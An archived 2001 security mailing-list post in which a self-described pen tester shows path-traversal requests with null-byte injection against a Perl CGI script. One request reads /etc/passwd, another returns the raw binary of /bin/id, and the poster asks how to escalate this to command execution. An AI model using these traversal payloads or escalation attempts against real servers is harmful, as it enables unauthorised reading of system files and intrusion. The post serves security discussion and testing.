Hi, I'm doing a pen test and I found a perl script, which seems to be vulnerable. If I do a get, for example: GET /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../etc/passwd%00 I can see the content of the passwd file. But when I try to execute a command, for example: GET /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../bin/id%00 I get this garbage and some interesting stuff: ELF t4P4 (44 vDD/usr/lib/ld.so.15HF$<#%C!-5AD,E0@2:(G8'4>3?;+B9&)*1/6= ".7d $ < T t , 0 Œ4getopt_startgetpwuid_environ_end_iob_ex_register__flsbuf_GLOBAL_OFFSET_TABLE_geteuidatexitexitgettext_inittextdomainsetgrentgetuidgetpwnam___Argvsetbuf_DYNAMICgetgrentprintf__iobsetlocale_exit_ex_deregisterenvironperror__cg89_usedgetgrgid__cg92_usedgetegid__fnonstd_usedoptindstrcmp_edata_PROCEDURE_LINKAGE_TABLE___fsr_init_valuegetgroups_etext_lib_versiongetgidmain__environ_lock_finifprintfendgrentlibc.so.1SUNW_1.1libc.so.1 ='‘2p/: ... more garbage .... `€@@@€2€ `€ €€ŸSUNW_OST_OSCMDaid: invalid user name: "%s" getgroupsgetgroups groups=%u(%s)Usage: id [user] id -a [user] %s%u%s%u%s=%u(%s)(%s)D00<0H0T0`0l0x0„0 T $P €88uid euid gid egid@(#)SunOS 5.7 Generic October 1998.interp.hash.dynsym.dynstr.SUNW_version.rela.ex_shared.rela.bss.rela.plt.text.init.fini.exception_ranges.rodata.rodata1.got.plt.dynamic.ex_shared.data.data1.bss.comment.shstrtab €ddžo - $ I'm not sure but I think, the %00 is the problem and without %00, I get no results. Does anybody know how I can execute my commands? I tried ; and , but nothing happened. I'm not able to see the source of the perl file. any help would be appreciated otaner -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Oct 18 2001 - 10:54:21 PDT